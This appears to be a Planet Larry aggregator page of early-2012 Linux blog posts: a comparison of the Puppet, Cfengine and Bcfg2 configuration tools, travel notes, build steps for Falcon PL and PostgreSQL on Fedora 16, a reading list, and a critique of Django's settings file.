The main problem is that n-th order tweakability is preferred over convention. It’s just stupid. There are a core set of things that just about everybody needs to do. Those should be dead simple, ready to uncomment and run. The set of operating systems used in the enterprise is fairly small: RHEL5, RHEL6, Debian 6, Ubuntu LTS. A configuration system should be opinionated and have complete out-of-the-box support for these platforms. Simple rulesets for the basics that nearly everyone uses should be ready to go: package management, process initialization, file management, ssh, sudo, DNS, Apache, PAM, PostgreSQL, MySQL, OpenLDAP, etc. Keep it simple. Keep it simple. Keep it simple. Resist all urges to add complexity.

That’s not the case.

You’d think after 30 years of Unix, BSD and Linux network deployments this would be pretty well-trodden ground. Wrong. It’s a complete crapshoot and everybody does things differently. Pick your poison and reinvent the stack ad infinitum.

This is one of the few areas I’m green with envy of the Microsoft side of the fence.  Between Active Directory, Group Policy,  and maybe a third party tool or two for cloning and installs and such, Microsoft environments can easily be set up and managed well by complete morons (and often are).


Puppet

Puppet seems to have potential. Of course, out of the box you’re pissing in the wind with a blank slate, and most books and sites will have you following tutorials to rewrite rulesets that thousands of other people before you have similarly cobbled together poorly. As a Ruby project, it unsurprisingly has vocal hipster fanboys. Unfortunately, they forgot to parrot their DRY principle to each other.

It centers around a domain-specific convention, which isn’t so bad… but in no time flat you’ll start seeing full-blown Ruby programs intermingled. Ugh. But it’s not so bad if you stick to the basics.

If you look around you can find reasonably complete module sets. It’s not all gravy, though, as these are heavily interdependent and kludgy. If you want a clean, simple solution you’re back to rolling your own with some healthy copy and paste.

Since it’s a Ruby project, aside from the annoying fanboys, you’re also going to run into scalability problems past a few hundred nodes.  There are mitigation strategies, but it’s a joke compared to something like Cfengine.

Due to hype, you’ll find decent versions in the Debian and Ubuntu backports repos.  RHEL 5 and 6 are covered by a Puppet Labs repo.  2.6 and 2.7 are therefore readily available and as long as your master is running the later version you shouldn’t have interop problems.

All things considered, Puppet is probably the best choice at the moment.  It sucks, but it’s got a lot of momentum behind it.  There are mountains of docs, books, and tutorials to get you going and nothing is too foreign or hard to grasp.

Cfengine 3

I really want to like Cfengine.  It’s incredibly light weight and hardcore ROFLscale.  It’s got serious theory behind it and older versions have been used in massive deployments.  But it’s not just a blank slate.  It’s even lower level and incomplete compared to the others.

You really need to add a promise library to get features that should be included by default. These are all stagnant, though, and still leave much to be desired.

There’s a company behind it doing something or another, but the open source version is raw.  If you have more than one Linux distribution, I’ll pretty much guarantee the packages are incompatible.

The repo choices aren’t great either.  Uncle Bob’s PPA on Ubuntu, out of luck on Debian.  RPMs in the EL repos look out of date.  You can of course get source and binaries from the Cfengine company, but it’s not my preferred way to install things and makes bootstrapping harder than it needs to be.

I haven’t tried the latest release, but quickly gave this one up when I found severe incompatibilities between point releases.  Madness.  You’d think people inventing something like promise theory could handle something as simple as version stability.

Ping me when a corporation backs Cfengine with a good promise library, some standard tasks, and repos for the common operating systems.


Bcfg2

Bcfg2 made the most sense to me out of the box. XML is yucky and out of fashion these days, but Bcfg2 manages to use it acceptably. Consequently, most things are declarative, easily read, and overall easy to mimic. Beyond that, you can tap into some Python template and generator stuff. But yes, these guys finally didn’t put n-th order above the common cases! Installing packages and ensuring services are on is a snap.

They’ve got their own repos for many distros so installation isn’t bad.

The client and server are Python so you’ll have similar scaling problems to Puppet in large environments.

My biggest grievance with Bcfg2 is that the server needs intimate knowledge of each operating system version’s package repos.  You’ll fumble around writing a good bit of XML definitions for this in a heterogeneous environment.

The main thing Bcfg2 is lacking right now is community momentum. With repo definitions included by default and some more doc work, I think this would be a great system for small to medium deployments.


The lot of this stuff is really terrible.  End to end system management under *nix is a major pain point.  On top of this, you’ll need a fairly free form monitoring framework (these also all suck) and directory service.  Mix and match an impossible array of projects and eventually you’ll find your own recipe that sort of works.  Except everyone does it differently so you’ll constantly be learning and redoing the same things over and over anyway.

It’s not fun.  What we need is end to end integrated thinking.  This area is still ripe for picking.  Oh RedHat, where art thou?


Posts for Sunday, January 8, 2012


Thailand, Berlin Velocity EU, NYC, Ghent and more metal

I've been meaning to write about a lot of stuff in separate posts, but they kept getting delayed, so I'll just briefly share everything in one post.


In July I did a 3-week group journey through Thailand arranged by Explorado, but organized by ("outsourced to") the 2 guides of Roots of Asia, who did an amazing job. The whole concept was exploring "the real Thailand" by means of eco-tourism. We've been in Bangkok (twice), Chiang Mai city, a mountain village in the province of Chiang Mai, through the jungle, at a fisherman village in Phuket and at the tropical island of Koh Phangan. The latter was at the end of the trip and was timed perfectly to get some deserved rest in a more touristy (although not too busy) area, but the majority of the trip was spent far away from the typical touristy areas so we could be submerged in honest, authentic Thai culture and visit authentic locations; often we were at places where seeing a group of white folks is not common.

We've been at unique authentic temples, stayed with various locals and hill tribes, shared meals with them, and took the same transport they did (at one point an entire village collected their bikes so we could borrow them for a bike trip through rice fields and some of the most beautiful lakes I've ever seen). We've had plenty of beautiful moments during those 3 weeks: visiting the home of a local Thai who built his entire house out of clay, by himself and some friends; visiting the ancient temple where our guide got married, in a forest in the hills (the most beautiful temple of the entire trip, though no other tourists go there because it's not really known, and it should probably be kept that way); or going to a bar in Chiang Mai city (one evening on my own, the next with a fellow traveler) to have some good times with some locals.

The eco-conscious part of the travel means:
  • green travel (minimize impact on the environment, "leave no trace"). Other than taking the plane over there and back we did a pretty good job, we've used public buses, night trains, biodegradable soap, etc
  • local foods (no import, minimal packaging, wrap in banana leaves, etc)
  • supporting Eco-conscious projects (like elephant nature park, which is an entire volunteer-based reserve to give mistreated elephants (which has been a big problem in Thailand) a better life, where we washed and fed elephants)
This has been a great experience. Although I found the culture in the South disgustingly based on profiting from tourists, and the cities too polluted and dirty, I've also seen cultures deeply respectful of nature and each other, living by values I've been trying to apply at home (values often frowned upon in our western society, brainwashed as we are by consumerism). That was beautiful and heartwarming.

Photo album


Berlin Velocity EU conference

I've been in Berlin for the first Velocity conference in the EU, which was quite good. The best part was probably the "Velocity Birds of a Feather" (whatever that means) unconference the day before at betahaus, which was great for meeting some folks such as the guys (which BTW, is the site we host our music on), although lots more interesting folks attended the conference itself (and it was packed). Berlin itself was nice too. Lots of history (Berlin wall, world war(s)), lots of impressive architecture (old and new), very cheap (albeit mediocre in quality) food, lots of Italian food, a bit cold though.

New York city

I'm still recovering from the awesome time I just had in NYC. I've been way more busy over there than I anticipated. I should have stayed 2 or 3 weeks instead of 1 :). I've met various locals (one of whom would love to become a city guide as a 2nd job because she just loves showing people around, so that just turned out great!). I didn't go for the typical touristy things (I skipped things like the WTC memorial, Empire State Building, Statue of Liberty, to the extent you can skip them, as they are very visible from pretty much all over the place). Instead, I wanted to get a feel of the real city and the people inhabiting it. I've seen parts of Queens, central and North-West Brooklyn, lots of areas (but not enough) in Manhattan and even Staten Island, been to a rock concert, comedy, improv and cabaret shows, the movies, more bars than I can count and mostly ate out with company (just as real new yorkers do, of course, though for breakfast that feels a bit weird). I even went shopping (not mall-shopping, but groceries in the supermarket, the Williamsburg Foodtown - that's what it's called - clerk advised me to enjoy every last second in the US, phrased in a way as if any other place in the world sucks in comparison, which is ridiculous, but turns out I followed his advice anyway) because I stayed at an apartment in Williamsburg, I also had 2 roommates, with whom I ironically couldn't spend as much time as I wanted to as I was so busy meeting up with all those other people, I also visited the Etsy and Vimeo offices (both are awesome) and met up with Dave Reisner (who is one of our latest Arch Linux devs, and who lives in NJ, but don't tell anyone) and who forgot to show me around in the Google office ;-) And I realize some of the past sentences are a bit long and busy but that's one of the things I learned at New York I guess. For one week, I almost lived like a real New Yorker, and it was interesting (but exhausting).

Move to Ghent

Enough about the trips. Back to daily life. I moved to the city of Ghent. Riding my bike to work every day along the scenic Coupure is fun. I am quite proud to say nearly all of my stuff in this apartment is second hand, and I've been lucky to receive some free stuff as well (thanks Bram!). Not (only) because I'm money conscious, but because I like to give things a second life instead of buying something new, lowering the impact on the environment. Even if it doesn't look too good, as long as it's functional. And this is exactly one of those values I mentioned above which is often not understood in our Western society, but I was pleased to find out this philosophy is the standard in large parts of Thai culture.

Death metal

We've done 3 gigs (which had a great reception, luckily) and we've already got a few planned for 2012, one of which will be at the From Rock Till Core festival in Merelbeke. We also did a semi-professional photo shoot, and I made a website (you can tell I'm not a designer).

That wraps up 2011 for me. Good times.. Happy new year everybody!

Posts for Monday, January 2, 2012

Compiling Falcon PL on Fedora 16

I don’t contribute code on a regular basis. I admit it, I’m a crappy developer. Also, I prefer not to lie: my C++ skills are lacking at best most days. Given that, though, here’s how you can set up, build, and install the Falcon programming language from Git on Fedora 16.

First set up a clone of the falcon git repository:
mkdir falcon
git clone

Install the necessary pre-reqs:
yum -y install gcc-c++ pcre-devel sqlite-devel curl-devel openssl-devel mysql-devel postgresql-devel doxygen

Granted the following packages from above are technically not “have-to-haves” but I take them all because I’m special:

  • sqlite-devel
  • curl-devel
  • openssl-devel
  • mysql-devel
  • postgresql-devel
  • doxygen

Make it so
cd falcon
mkdir build
cd build
cmake ..
make install

Finally, so Falcon will actually run, you’ll need to add /usr/local/lib to your /etc/ file.

Thanks to the Falcon PL mailing list for help with that last part.

Posts for Sunday, January 1, 2012

reading in review 2011

It’s been another prolific year in page turning. I’ve decided to scrap the idea of doing a long list like last year, it’s too dull. Instead I’m doing a brief review.

The best of the best (of the best)

The credit goes to the indomitable Steve Yegge for making a strong recommendation for it. And boy did it check out.

Gödel, Escher, Bach ~ Douglas Hofstadter

GEB is simply the most important book I’ve ever read. Hofstadter sets out to do one thing and do it well, namely to give a description of how consciousness works, or could work. He does this by way of countless enticing analogies across different fields, chiefly mathematics, art, music, computer science and genetics. It’s a challenging book and a very rewarding one. In order to get through it profitably I had to put myself on a relatively intense schedule to make sure I had enough context in mind at all times.

The better books

Looking back over the year there are quite a few that deserve a mention here.


Apocalittici e integrati ~ Umberto Eco


SuperFreakonomics ~ Steven Levitt


Due di due ~ Andrea Di Carlo
Il fu Mattia Pascal ~ Luigi Pirandello
Il nome della rosa ~ Umberto Eco


A History of Western Philosophy ~ Bertrand Russell
Man is the Measure ~ Reuben Abel
Religion and Science ~ Bertrand Russell
The Moral Landscape ~ Sam Harris
Zen and the Art of Motorcycle Maintenance ~ Robert Pirsig

Purely for fun

Kruistocht in spijkerbroek ~ Thea Beckman
The Broker ~ John Grisham
The Hitchhiker’s Guide to the Galaxy ~ Douglas Adams


Cose di Cosa Nostra ~ Giovanni Falcone
La baia dei pirati ~ Luca Neri
Lettera a una professoressa ~ Lorenzo Milani
Se questo è un uomo ~ Primo Levi
Todo modo ~ Leonardo Sciascia

Less compelling, but worth a look


Il conformista ~ Alberto Moravia
L’avventura di un povero cristiano ~ Ignazio Silone
Le cosmicomiche ~ Italo Calvino


Le Rire ~ Henri Bergson
The Problems of Philosophy ~ Bertrand Russell

Purely for fun

Le Petit Prince ~ Antoine de Saint-Exupéry


A Short History Of Nearly Everything ~ Bill Bryson


Morte dell’inquisitore ~ Leonardo Sciascia
Vaticano S.p.A. ~ Gianluigi Nuzzi

Classics that work

A special mention for Il principe which is quite fascinating, both for the time it was written, the frankness of the analysis and the efficacy of its insights.

A Portrait of the Artist as a Young Man ~ James Joyce
I promessi sposi ~ Alessandro Manzoni
Il principe ~ Niccolò Machiavelli
Le comte de Monte Cristo ~ Alexandre Dumas
Les Trois Mousquetaires ~ Alexandre Dumas
The Picture of Dorian Gray ~ Oscar Wilde

Classics that don’t check out

For every batch of classics there are those that just aren’t particularly worth reading. Either because they are too boring (Kafka), the characters are so annoying that you never begin to care what happens to them (Karamazov), because the language is abstruse to the point of being near impenetrable (Nietzsche), because the reasoning is so dated it bears little relevance to present times (Descartes), because the events are so remote they are of little interest today (Discorsi), or because the author is simply a dullard narcissist (Thoreau).

Beyond Good and Evil ~ Friedrich Nietzsche
Discorsi sulla prima deca di Tito Livio ~ Niccolò Machiavelli
Il piacere ~ Gabriele d’Annunzio
Méditations métaphysiques ~ René Descartes
The Brothers Karamazov ~ Fyodor Dostoyevsky
The Castle ~ Franz Kafka
Thus Spoke Zarathustra ~ Friedrich Nietzsche
Walden ~ Henry David Thoreau


Žižek is fascinating and great fun to read, although he tends to recycle his jokes and analogies quite a bit. This year I set out to read all of his books that I could find in Dutch.

Actuele filosofie ~ Alain Badiou
Conversations with Žižek ~ Slavoj Žižek
Intolerantie ~ Slavoj Žižek
Violence ~ Slavoj Žižek
Welcome to the Desert of the Real ~ Slavoj Žižek


It’s been a good year for Italian. And for Dutch. But I so rarely find anything worth reading in the Scandinavian languages, which is a bit of a shame. I’m about ready now to wind down with Italian next year, and have more time for Dutch and French.

As last year I managed to introduce some new languages.

1 *afrikaans
33 english
1 *español
16 *français
44 italiano
28 nederlands
3 polski
2 svenska
128 Total

* debut in 2011

Django and the localsettings anti-pattern

In the Django web framework, the configuration happens in a file called Often you want different settings for different versions of a site, e.g. a development branch versus the live branch. Thus far, I have always been a lone developer or part of a small team, so usually a couple of branches is enough. However, in a large organization you might have several staging sites for various testers.

A common convention is to have a file called something like or This file is imported by the main file. Therefore the production and development sites have the same file (containing all the boilerplate) but different files containing the branch specific settings.
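The convention looks something like the following sketch; the file and setting names here are illustrative, and your project’s boilerplate will differ:

```python
# settings.py (tail) -- a minimal sketch of the localsettings convention;
# file and setting names are illustrative, not prescribed by Django.
DEBUG = False
DATABASES = {"default": {"ENGINE": "django.db.backends.postgresql"}}

# Branch-specific overrides (DB password, DEBUG, ...) live in a file that is
# kept out of the public repository and simply shadows the defaults above.
try:
    from local_settings import *  # noqa: F401,F403
except ImportError:
    pass  # no local_settings.py on this branch: keep the defaults
```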

In this presentation, Jacob Kaplan-Moss calls this the "localsettings anti-pattern" (slide 47). What he seems to be recommending instead is having a different WSGI file for each branch (Web Server Gateway Interface is the protocol that Python applications use to talk to web servers), each pointing to a separate settings file.

This moves the problem up a level, but does it really change anything? One of the reasons that people have the file is to have the database password not part of a public version control repository. I am not sure how much Jacob's solution helps. Am I missing something? Now I have two pairs of files instead of one.

I know at least Bazaar has a shared repository feature, where you could conceivably have a secret branch and a public branch with a single file tree, but setting that up is a lot of work just to version control a password and a few other secret settings.

is the anti-pattern

This is just a symptom. The underlying problem is that itself is the anti-pattern. You might always need some kind of configuration file for database settings and other secrets, but the file mixes in a shopping list of other junk.

Most of them could be gotten rid of. Django should just set sensible defaults, and where the (minority) user wants to configure them, make the option a simple argument to whatever class, method or function is being used.

Contrib and third-party applications add even more settings which could be arguments or options in the database.

The whole advantage of Python is that it is an interpreted, interactive and dynamic language where you can change things at runtime. Having a load of hard-coded static global variables is not Pythonic at all.

When you use the admin site, you subclass admin.ModelAdmin for every model that you want to use:

from django.contrib import admin
from myproject.myapp.models import Author

class AuthorAdmin(admin.ModelAdmin):
    pass

admin.site.register(Author, AuthorAdmin)

Each ModelAdmin subclass configures what applications are used and how. You have imported your model (Author in the example above), and registered it using That should be all the info the admin site needs to work.

This is object oriented and Pythonic. This is how things should work everywhere in Django. There is no need for a hard-coded global static INSTALLED_APPS setting.
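As a rough illustration of that register-based style (all names below are hypothetical, not part of Django’s API), a framework could derive the installed-apps information at runtime from what has registered itself:

```python
# A minimal sketch of admin-style registration as an alternative to a global
# INSTALLED_APPS setting. All names here are hypothetical, not Django API.

class Site:
    """Collects components that register themselves, admin.site style."""

    def __init__(self):
        self._registry = {}

    def register(self, model, options=None):
        self._registry[model] = options or {}

    def installed(self):
        # Equivalent information to INSTALLED_APPS, derived at runtime
        # from what actually registered itself.
        return sorted(m.__name__ for m in self._registry)


class Author:
    pass


class Book:
    pass


site = Site()
site.register(Author)
site.register(Book)
print(site.installed())  # ['Author', 'Book']
```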

So what now?

So I don't really know what Jacob is telling us to do. I am sure someone will write in and tell me that my mistake is that I should have used Rails or some obscure web framework named and documented in Burgenland Croatian hidden somewhere on github!

Happy New Year!

PostgreSQL Setup – Fedora 16

First install everything we’ll need, then initialize the cluster and start it (initdb and pg_ctl must be run as the postgres user, not root).

yum install postgresql postgresql-server
initdb -D /var/lib/pgsql/data/
pg_ctl -D /var/lib/pgsql/data -l logfile start

And that should do it. It’s really that easy. You can also run this

ps -eZ | grep postgres

and that will show all the running postgres processes. After that you can do awesome things like create databases

createdb new_database

Good luck!

Posts for Saturday, December 31, 2011

Happy New Year!

Happy new year! Enjoy the penguins!

Planet Larry is not officially affiliated with Gentoo Linux. Original artwork and logos copyright Gentoo Foundation. Yadda, yadda, yadda.